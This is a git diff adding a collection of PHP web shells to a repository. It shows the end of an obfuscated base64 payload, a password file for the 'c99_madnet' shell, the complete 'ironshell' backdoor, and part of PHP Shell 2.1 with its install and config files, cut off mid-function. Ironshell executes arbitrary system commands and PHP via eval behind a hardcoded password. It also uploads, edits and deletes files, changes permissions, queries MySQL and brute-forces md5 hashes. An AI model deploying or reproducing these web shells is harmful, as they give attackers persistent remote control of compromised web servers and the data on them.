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'))); +?> diff --git a/php/PHPshell/م€گc99_madnetم€‘/ه¯†ç پ.txt b/php/PHPshell/م€گc99_madnetم€‘/ه¯†ç پ.txt new file mode 100644 index 0000000..742f9ec --- /dev/null +++ b/php/PHPshell/م€گc99_madnetم€‘/ه¯†ç پ.txt @@ -0,0 +1,2 @@ +صث؛إ:smowu +أـآë:smowu \ No newline at end of file diff --git a/php/PHPshell/م€گc99_madnetم€‘/è؟‍وژ¥ه¯†ç پ.jpg b/php/PHPshell/م€گc99_madnetم€‘/è؟‍وژ¥ه¯†ç پ.jpg new file mode 100644 index 0000000..9dca11f Binary files /dev/null and b/php/PHPshell/م€گc99_madnetم€‘/è؟‍وژ¥ه¯†ç پ.jpg differ diff --git a/php/PHPshell/م€گironshellم€‘/ironshell.jpg b/php/PHPshell/م€گironshellم€‘/ironshell.jpg new file mode 100644 index 0000000..d22bfad Binary files /dev/null and b/php/PHPshell/م€گironshellم€‘/ironshell.jpg differ diff --git a/php/PHPshell/م€گironshellم€‘/ironshell.php b/php/PHPshell/م€گironshellم€‘/ironshell.php new file mode 100644 index 0000000..b6931f1 --- /dev/null +++ b/php/PHPshell/م€گironshellم€‘/ironshell.php @@ -0,0 +1,588 @@ +<?php +error_reporting(0); //If there is an error, we'll show it, k? + +$password = "login"; // You can put a md5 string here too, for plaintext passwords: max 31 chars. + +$me = basename(__FILE__); +$cookiename = "wieeeee"; + + +if(isset($_POST['pass'])) //If the user made a login attempt, "pass" will be set eh? +{ + + if(strlen($password) == 32) //If the length of the password is 32 characters, threat it as an md5. + { + $_POST['pass'] = md5($_POST['pass']); + } + + if($_POST['pass'] == $password) + { + setcookie($cookiename, $_POST['pass'], time()+3600); //It's alright, let hem in + } + reload(); +} + + + +if(!empty($password) && !isset($_COOKIE[$cookiename]) or ($_COOKIE[$cookiename] != $password)) +{ + login(); + die(); +} +// +//Do not cross this line! All code placed after this block can't be executed without being logged in! +// + +if(isset($_GET['p']) && $_GET['p'] == "logout") +{ +setcookie ($cookiename, "", time() - 3600); +reload(); +} +if(isset($_GET['dir'])) +{ + chdir($_GET['dir']); +} + + +$pages = array( + 'cmd' => 'Execute Command', + 'eval' => 'Evaluate PHP', + 'mysql' => 'MySQL Query', + 'chmod' => 'Chmod File', + 'phpinfo' => 'PHPinfo', + 'md5' => 'md5 cracker', + 'headers' => 'Show headers', + 'logout' => 'Log out' +); + +//The header, like it? +$header = '<html> +<title>'.getenv("HTTP_HOST").' ~ Shell I</title> +<head> +<style> +td { + font-size: 12px; + font-family: verdana; + color: #33FF00; + background: #000000; +} + +#d { + background: #003000; +} +#f { + background: #003300; +} +#s { + background: #006300; +} +#d:hover +{ + background: #003300; +} +#f:hover +{ + background: #003000; +} +pre { + font-size: 10px; + font-family: verdana; + color: #33FF00; +} +a:hover { +text-decoration: none; +} + + +input,textarea,select { + border-top-width: 1px; + font-weight: bold; + border-left-width: 1px; + font-size: 10px; + border-left-color: #33FF00; + background: #000000; + border-bottom-width: 1px; + border-bottom-color: #33FF00; + color: #33FF00; + border-top-color: #33FF00; + font-family: verdana; + border-right-width: 1px; + border-right-color: #33FF00; +} + +hr { +color: #33FF00; +background-color: #33FF00; +height: 5px; +} + +</style> + +</head> +<body bgcolor=black alink="#33CC00" vlink="#339900" link="#339900"> +<table width=100%><td id="header" width=100%> +<p align=right><b>[<a href="http://www.rootshell-team.info">RootShell</a>] [<a href="'.$me.'">Home</a>] '; + +foreach($pages as $page => $page_name) +{ + $header .= ' [<a href="?p='.$page.'&dir='.realpath('.').'">'.$page_name.'</a>] '; + +} +$header .= '<br><hr>'.show_dirs('.').'</td><tr><td>'; +print $header; + +$footer = '<tr><td><hr><center>&copy; <a href="http://www.ironwarez.info">Iron</a> & <a href="http://www.rootshell-team.info">RootShell Security Group</a></center></td></table></body></head></html>'; + + +// +//Page handling +// +if(isset($_REQUEST['p'])) +{ + switch ($_REQUEST['p']) { + + case 'cmd': //Run command + + print "<form action=\"".$me."?p=cmd&dir=".realpath('.')."\" method=POST><b>Command:</b><input type=text name=command><input type=submit value=\"Execute\"></form>"; + if(isset($_REQUEST['command'])) + { + print "<pre>"; + execute_command(get_execution_method(),$_REQUEST['command']); //You want fries with that? + } + break; + + + case 'edit': //Edit a fie + if(isset($_POST['editform'])) + { + $f = $_GET['file']; + $fh = fopen($f, 'w') or print "Error while opening file!"; + fwrite($fh, $_POST['editform']) or print "Couldn't save file!"; + fclose($fh); + } + print "Editing file <b>".$_GET['file']."</b> (".perm($_GET['file']).")<br><br><form action=\"".$me."?p=edit&file=".$_GET['file']."&dir=".realpath('.')."\" method=POST><textarea cols=90 rows=15 name=\"editform\">"; + + if(file_exists($_GET['file'])) + { + $rd = file($_GET['file']); + foreach($rd as $l) + { + print htmlspecialchars($l); + } + } + + print "</textarea><input type=submit value=\"Save\"></form>"; + + break; + + case 'delete': //Delete a file + + if(isset($_POST['yes'])) + { + if(unlink($_GET['file'])) + { + print "File deleted successfully."; + } + else + { + print "Couldn't delete file."; + } + } + + + if(isset($_GET['file']) && file_exists($_GET['file']) && !isset($_POST['yes'])) + { + print "Are you sure you want to delete ".$_GET['file']."?<br> + <form action=\"".$me."?p=delete&file=".$_GET['file']."\" method=POST> + <input type=hidden name=yes value=yes> + <input type=submit value=\"Delete\"> + "; + } + + + break; + + + case 'eval': //Evaluate PHP code + + print "<form action=\"".$me."?p=eval\" method=POST> + <textarea cols=60 rows=10 name=\"eval\">"; + if(isset($_POST['eval'])) + { + print htmlspecialchars($_POST['eval']); + } + else + { + print "print \"Yo Momma\";"; + } + print "</textarea><br> + <input type=submit value=\"Eval\"> + </form>"; + + if(isset($_POST['eval'])) + { + print "<h1>Output:</h1>"; + print "<br>"; + eval($_POST['eval']); + } + + break; + + case 'chmod': //Chmod file + + + print "<h1>Under construction!</h1>"; + if(isset($_POST['chmod'])) + { + switch ($_POST['chvalue']){ + case 777: + chmod($_POST['chmod'],0777); + break; + case 644: + chmod($_POST['chmod'],0644); + break; + case 755: + chmod($_POST['chmod'],0755); + break; + } + print "Changed permissions on ".$_POST['chmod']." to ".$_POST['chvalue']."."; + } + if(isset($_GET['file'])) + { + $content = urldecode($_GET['file']); + } + else + { + $content = "file/path/please"; + } + + print "<form action=\"".$me."?p=chmod&file=".$content."&dir=".realpath('.')."\" method=POST><b>File to chmod: + <input type=text name=chmod value=\"".$content."\" size=70><br><b>New permission:</b> + <select name=\"chvalue\"> +<option value=\"777\">777</option> +<option value=\"644\">644</option> +<option value=\"755\">755</option> +</select><input type=submit value=\"Change\">"; + + break; + + case 'mysql': //MySQL Query + + if(isset($_POST['host'])) + { + $link = mysql_connect($_POST['host'], $_POST['username'], $_POST['mysqlpass']) or die('Could not connect: ' . mysql_error()); + mysql_select_db($_POST['dbase']); + $sql = $_POST['query']; + + + $result = mysql_query($sql); + + } + else + { + print " + This only queries the database, doesn't return data!<br> + <form action=\"".$me."?p=mysql\" method=POST> + <b>Host:<br></b><input type=text name=host value=\"localhost\" size=10><br> + <b>Username:<br><input type=text name=username value=\"root\" size=10><br> + <b>Password:<br></b><input type=password name=mysqlpass value=\"\" size=10><br> + <b>Database:<br><input type=text name=dbase value=\"test\" size=10><br> + + <b>Query:<br></b<textarea name=query></textarea> + <input type=submit value=\"Query database\"> + </form> + "; + + } + + break; + + case 'createdir': + if(mkdir($_GET['crdir'])) + { + print 'Directory created successfully.'; + } + else + { + print 'Couldn\'t create directory'; + } + break; + + + case 'phpinfo': //PHP Info + phpinfo(); + break; + + + case 'rename': + + if(isset($_POST['fileold'])) + { + if(rename($_POST['fileold'],$_POST['filenew'])) + { + print "File renamed."; + } + else + { + print "Couldn't rename file."; + } + + } + if(isset($_GET['file'])) + { + $file = basename(htmlspecialchars($_GET['file'])); + } + else + { + $file = ""; + } + + print "Renaming ".$file." in folder ".realpath('.').".<br> + <form action=\"".$me."?p=rename&dir=".realpath('.')."\" method=POST> + <b>Rename:<br></b><input type=text name=fileold value=\"".$file."\" size=70><br> + <b>To:<br><input type=text name=filenew value=\"\" size=10><br> + <input type=submit value=\"Rename file\"> + </form>"; + break; + + case 'md5': + if(isset($_POST['md5'])) + { + if(!is_numeric($_POST['timelimit'])) + { + $_POST['timelimit'] = 30; + } + set_time_limit($_POST['timelimit']); + if(strlen($_POST['md5']) == 32) + { + + if($_POST['chars'] == "9999") + { + $i = 0; + while($_POST['md5'] != md5($i) && $i != 100000) + { + $i++; + } + } + else + { + for($i = "a"; $i != "zzzzz"; $i++) + { + if(md5($i == $_POST['md5'])) + { + break; + } + } + } + + + if(md5($i) == $_POST['md5']) + { + print "<h1>Plaintext of ". $_POST['md5']. " is <i>".$i."</i></h1><br><br>"; + } + + } + + } + + print "Will bruteforce the md5 + <form action=\"".$me."?p=md5\" method=POST> + <b>md5 to crack:<br></b><input type=text name=md5 value=\"\" size=40><br> + <b>Characters:</b><br><select name=\"chars\"> + <option value=\"az\">a - zzzzz</option> + <option value=\"9999\">1 - 9999999</option> + </select> + <b>Max. cracking time*:<br></b><input type=text name=timelimit value=\"30\" size=2><br> + <input type=submit value=\"Bruteforce md5\"> + </form><br>*: if set_time_limit is allowed by php.ini"; + break; + + case 'headers': + foreach(getallheaders() as $header => $value) + { + print htmlspecialchars($header . ":" . $value)."<br>"; + + } + break; + } + +} +else //Default page that will be shown when the page isn't found or no page is selected. +{ + + $files = array(); + $directories = array(); + + if(isset($_FILES['uploadedfile']['name'])) +{ + $target_path = realpath('.').'/'; + $target_path = $target_path . basename( $_FILES['uploadedfile']['name']); + + if(move_uploaded_file($_FILES['uploadedfile']['tmp_name'], $target_path)) { + print "File:". basename( $_FILES['uploadedfile']['name']). + " has been uploaded"; + } else{ + echo "File upload failed!"; + } +} + + + + + + print "<table border=0 width=100%><td width=5% id=s><b>Options</b></td><td id=s><b>Filename</b></td><td id=s><b>Size</b></td><td id=s><b>Permissions</b></td><td id=s>Last modified</td><tr>"; + if ($handle = opendir('.')) + { + while (false !== ($file = readdir($handle))) + { + if(is_dir($file)) + { + $directories[] = $file; + } + else + { + $files[] = $file; + } + } + asort($directories); + asort($files); + foreach($directories as $file) + { + print "<td id=d><a href=\"?p=rename&file=".realpath($file)."&dir=".realpath('.')."\">[R]</a><a href=\"?p=delete&file=".realpath($file)."\">[D]</a></td><td id=d><a href=\"".$me."?dir=".realpath($file)."\">".$file."</a></td><td id=d></td><td id=d><a href=\"?p=chmod&dir=".realpath('.')."&file=".realpath($file)."\"><font color=".get_color($file).">".perm($file)."</font></a></td><td id=d>".date ("Y/m/d, H:i:s", filemtime($file))."</td><tr>"; + } + + foreach($files as $file) + { + print "<td id=f><a href=\"?p=rename&file=".realpath($file)."&dir=".realpath('.')."\">[R]</a><a href=\"?p=delete&file=".realpath($file)."\">[D]</a></td><td id=f><a href=\"".$me."?p=edit&dir=".realpath('.')."&file=".realpath($file)."\">".$file."</a></td><td id=f>".filesize($file)."</td><td id=f><a href=\"?p=chmod&dir=".realpath('.')."&file=".realpath($file)."\"><font color=".get_color($file).">".perm($file)."</font></a></td><td id=f>".date ("Y/m/d, H:i:s", filemtime($file))."</td><tr>"; + } + } + else + { + print "<u>Error!</u> Can't open <b>".realpath('.')."</b>!<br>"; + } + + print "</table><hr><table border=0 width=100%><td><b>Upload file</b><br><form enctype=\"multipart/form-data\" action=\"".$me."?dir=".realpath('.')."\" method=\"POST\"> +<input type=\"hidden\" name=\"MAX_FILE_SIZE\" value=\"100000000\" /><input size=30 name=\"uploadedfile\" type=\"file\" /> +<input type=\"submit\" value=\"Upload File\" /> +</form></td><td><form action=\"".$me."\" method=GET><b>Change Directory<br></b><input type=text size=40 name=dir value=\"".realpath('.')."\"><input type=submit value=\"Change Directory\"></form></td> +<tr><td><form action=\"".$me."\" method=GET><b>Create file<br></b><input type=hidden name=dir value=\"".realpath('.')."\"><input type=text size=40 name=file value=\"".realpath('.')."\"><input type=hidden name=p value=edit><input type=submit value=\"Create file\"></form> +</td><td><form action=\"".$me."\" method=GET><b>Create directory<br></b><input type=text size=40 name=crdir value=\"".realpath('.')."\"><input type=hidden name=dir value=\"".realpath('.')."\"><input type=hidden name=p value=createdir><input type=submit value=\"Create directory\"></form></td> +</table>"; + + +} + + +function login() +{ + print "<table border=0 width=100% height=100%><td valign=\"middle\"><center> + <form action=".basename(__FILE__)." method=\"POST\"><b>Password?</b> + <input type=\"password\" maxlength=\"32\" name=\"pass\"><input type=\"submit\" value=\"Login\"> + </form>"; +} +function reload() +{ + header("Location: ".basename(__FILE__)); +} + +function get_execution_method() +{ + if(function_exists('passthru')){ $m = "passthru"; } + if(function_exists('exec')){ $m = "exec"; } + if(function_exists('shell_exec')){ $m = "shell_ exec"; } + if(function_exists('system')){ $m = "system"; } + if(!isset($m)) //No method found :-| + { + $m = "Disabled"; + } + return($m); +} + +function execute_command($method,$command) +{ + if($method == "passthru") + { + passthru($command); + } + + elseif($method == "exec") + { + exec($command,$result); + foreach($result as $output) + { + print $output."<br>"; + } + } + + elseif($method == "shell_exec") + { + print shell_exec($command); + } + + elseif($method == "system") + { + system($command); + } + +} + +function perm($file) +{ + if(file_exists($file)) + { + return substr(sprintf('%o', fileperms($file)), -4); + } + else + { + return "????"; + } +} + +function get_color($file) +{ +if(is_writable($file)) { return "green";} +if(!is_writable($file) && is_readable($file)) { return "white";} +if(!is_writable($file) && !is_readable($file)) { return "red";} + + + +} + +function show_dirs($where) +{ + if(ereg("^c:",realpath($where))) + { + $dirparts = explode('\\',realpath($where)); + } + else + { + $dirparts = explode('/',realpath($where)); + } + + + + $i = 0; + $total = ""; + + foreach($dirparts as $part) + { + $p = 0; + $pre = ""; + while($p != $i) + { + $pre .= $dirparts[$p]."/"; + $p++; + + } + $total .= "<a href=\"".basename(__FILE__)."?dir=".$pre.$part."\">".$part."</a>/"; + $i++; + } + + return "<h2>".$total."</h2><br>"; + +} +print $footer; + +// Exit: maybe we're included somewhere and we don't want the other code to mess with ours :-) +exit(); +?> diff --git a/php/PHPshell/م€گironshellم€‘/ه¯†ç پ.txt b/php/PHPshell/م€گironshellم€‘/ه¯†ç پ.txt new file mode 100644 index 0000000..dbd0336 --- /dev/null +++ b/php/PHPshell/م€گironshellم€‘/ه¯†ç پ.txt @@ -0,0 +1,5 @@ +login + +±¸×¢:²»ح¬ب¨دقخؤ¼‏¼ذسأ²»ح¬رصة«اّ·ض³ِہ´ + + بç:777 750 730 \ No newline at end of file diff --git a/php/PHPshell/م€گphpshell-2.1م€‘/INSTALL b/php/PHPshell/م€گphpshell-2.1م€‘/INSTALL new file mode 100644 index 0000000..28eac98 --- /dev/null +++ b/php/PHPshell/م€گphpshell-2.1م€‘/INSTALL @@ -0,0 +1,96 @@ +INSTALL file for PHP Shell 2.1 +Copyright (C) 2000-2005 Martin Geisler <mgeisler@mgeisler.net> +Licensed under the GNU GPL. See the file COPYING for details. + + +Downloading PHP Shell +===================== + +You can always get the latest version of PHP Shell from my homepage: + + http://mgeisler.net/php-shell/ + + + +Installation +============ + +Installation is easy: first unpack the tarball or zipfile downloaded from the +above website into your webserver. This will create a subdirectory called +phpweather-2.1 for PHP Shell version 2.1. + +Try loading the file ``phpshell.php`` in your browser and check that you are +served a page that asks you to authenticate yourself with a username and a +password. If you do not see such a page, then please check that you have +entered the URL correctly and that PHP is working on your server. + + + +Configuration +============= + +All configuration happens in the ``config.php`` file. This is an ini-file +dispite its name. Ini-files consist of a number of sections, each containing +a number of 'key = "value"' pairs. PHP Shell has tree sections: '[users]' for +configuring usernames and passwords, '[aliases]' for configuring shell +aliases, and '[settings]' for general settings. + + +Setting Usernames and Passwords +------------------------------- + +As a security precaution PHP Shell has no default username and password +(people often forget to change them...). To add the user "alice" with +password "secret" you simply add + + [users] + alice = "secret" + +to the file. Note that you can add as many users as you want by simply adding +more lines like this. + +This system works, but there is a better way --- a way so that the password +does not appear in clear text in the file. For that you use the supplied +script ``pwhash.php`` to generate a hashed password. Please see the +instructions given in ``pwhash.php``. + +With the above example the result could look like + + [users] + alice = "md5:7ea3b59e:eb271c4459253eaa163fcac2a119f225" + +You will not get exactly the same line if you try it out, this is a feature of +the system which means that both "alice" and "bob" could have "secret" as +their password, and you would not be able to tell from just looking at +``config.php``. + + +Shell Aliases +------------- + +As in a normal shell, PHP Shell supports alias expansion, albeit in a simple +form. Aliases are defined by 'key = "value"' pairs in the '[aliases]' +section. The "key" will be matched against the first token of the command +line and substituted with the "value" given. + +Two convenient aliases are already defined: + + [aliases] + ls = "ls -CvhF" + ll = "ls -lvhF" + + +General Settings +---------------- + +PHP has just one other setting right now --- the home directory. Change this +in the '[settings]' section. + + + +Bugs? Comments? +================ + +If you find a bug or miss something in PHP Shell, please don't hesitate to +mail me at <mgeisler@mgeisler.net>! Or you could drop by and leave a comment +at http://mgeisler.net/php-shell/. diff --git a/php/PHPshell/م€گphpshell-2.1م€‘/config.php b/php/PHPshell/م€گphpshell-2.1م€‘/config.php new file mode 100644 index 0000000..32ffc88 --- /dev/null +++ b/php/PHPshell/م€گphpshell-2.1م€‘/config.php @@ -0,0 +1,54 @@ +; <?php die('Forbidden'); ?> +; Do not remove the above line, it prevents this file from being downloaded. +; +; config.php file for PHP Shell 2.1 +; Copyright (C) 2005 Martin Geisler <mgeisler@mgeisler.net> +; Licensed under the GNU GPL. See the file COPYING for details. + +; This ini-file has three parts: +; +; * [users] where you add usernames and passwords to give users access to PHP +; Shell. +; +; * [aliases] where you can configure shell aliases. +; +; * [settings] where general settings are placed. + + +[users] + +; The default configuration has no users defined, you have to add your own +; (choose good passwords!). Add uses as simple 'username = "password"' lines. +; Please quote your password using double-quotes as shown. The semi-colon ':' +; is a reserved character, so do *not* use that in your passwords. +; +; For improved security it is *strongly suggested* that you the pwhash.php +; script to generate a hashed password and store that instead of the normal +; clear text password. Keeping your passwords in hashed form ensures that +; they cannot be found, even if this file is disclosed. The passwords are +; still visible in clear text during the login, though. Please follow the +; instructions given in pwhash.php. + +alice = "secret" + +[aliases] + +; Alias expansion. Change the two examples as needed and add your own +; favorites --- feel free to suggest more defaults! The command line you +; enter will only be expanded on the very first token and only once, so having +; 'ls' expand into 'ls -CvhF' does not cause an infinite recursion. + +ls = "ls -CvhF" +ll = "ls -lvhF" + + + +[settings] + +; General settings for PHP Shell. + +; Home directory. PHP Shell will change to this directory upon startup and +; whenever a bare 'cd' command is given. This can be an absolute path or a +; path relative to the PHP Shell installation directory. + +home-directory = "." diff --git a/php/PHPshell/م€گphpshell-2.1م€‘/phpshell3.jpg b/php/PHPshell/م€گphpshell-2.1م€‘/phpshell3.jpg new file mode 100644 index 0000000..5e6fe49 Binary files /dev/null and b/php/PHPshell/م€گphpshell-2.1م€‘/phpshell3.jpg differ diff --git a/php/PHPshell/م€گphpshell-2.1م€‘/phpshell3.php b/php/PHPshell/م€گphpshell-2.1م€‘/phpshell3.php new file mode 100644 index 0000000..cd9a3c0 --- /dev/null +++ b/php/PHPshell/م€گphpshell-2.1م€‘/phpshell3.php @@ -0,0 +1,408 @@ +<?php // -*- coding: utf-8 -*- + +/* + + ************************************************************** + * PHP Shell 2.1 * + ************************************************************** + + PHP Shell is an interactive PHP script that will execute any command + entered. See the files README, INSTALL, and SECURITY or + http://mgeisler.net/php-shell/ for further information. + + Copyright (C) 2000-2005 Martin Geisler <mgeisler@mgeisler.net> + + This program is free software; you can redistribute it and/or + modify it under the terms of the GNU General Public License + as published by the Free Software Foundation; either version 2 + of the License, or (at your option) any later version. + + This program is distributed in the hope that it will be useful, + but WITHOUT ANY WARRANTY; without even the implied warranty of + MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the + GNU General Public License for more details. + + You can get a copy of the GNU General Public License from this + address: http://www.gnu.org/copyleft/gpl.html#SEC1 + You can also write to the Free Software Foundation, Inc., 59 Temple + Place - Suite 330, Boston, MA 02111-1307, USA. + +*/ + +/* There are no user-configurable settings in this file anymore, please see + * config.php instead. */ + + +/* This error handler will turn all notices, warnings, and errors into fatal + * errors, unless they have been suppressed with the @-operator. */ +function error_handler($errno, $errstr, $errfile, $errline, $errcontext) { + /* The @-opertor (used with chdir() below) temporarely makes + * error_reporting() return zero, and we don't want to die in that case. + * We do note the error in the output, though. */ + if (error_reporting() == 0) { + $_SESSION['output'] .= $errstr . "\n"; + } else { + die('<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" + "http://www.w3.org/TR/html4/strict.dtd"> +<html> +<head> + <title>PHP Shell 2.1</title> + <link rel="stylesheet" href="style.css" type="text/css"> +</head> +<body> + <h1>Fatal Error!</h1> + <p><b>' . $errstr . '</b></p> + <p>in <b>' . $errfile . '</b>, line <b>' . $errline . '</b>.</p> + + <hr> + + <p>Please consult the <a href="README">README</a>, <a + href="INSTALL">INSTALL</a>, and <a href="SECURITY">SECURITY</a> files for + instruction on how to use PHP Shell.</p> + + <hr> + + <address> + Copyright &copy; 2000&ndash;2005, <a + href="mailto:mgeisler@mgeisler.net">Martin Geisler</a>. Get the latest + version at <a + href="http://mgeisler.net/php-shell/">mgeisler.net/php-shell/</a>. + </address> + +</body> +</html>'); + } +} + +/* Installing our error handler makes PHP die on even the slightest problem. + * This is what we want in a security critical application like this. */ +set_error_handler('error_handler'); + + +function logout() { + /* Empty the session data, except for the 'authenticated' entry which the + * rest of the code needs to be able to check. */ + $_SESSION = array('authenticated' => false); + + /* Unset the client's cookie, if it has one. */ +// if (isset($_COOKIE[session_name()])) +// setcookie(session_name(), '', time()-42000, '/'); + + /* Destroy the session data on the server. This prevents the simple + * replay attach where one uses the back button to re-authenticate using + * the old POST data since the server wont know the session then.*/ +// session_destroy(); +} + + +function stripslashes_deep($value) { + if 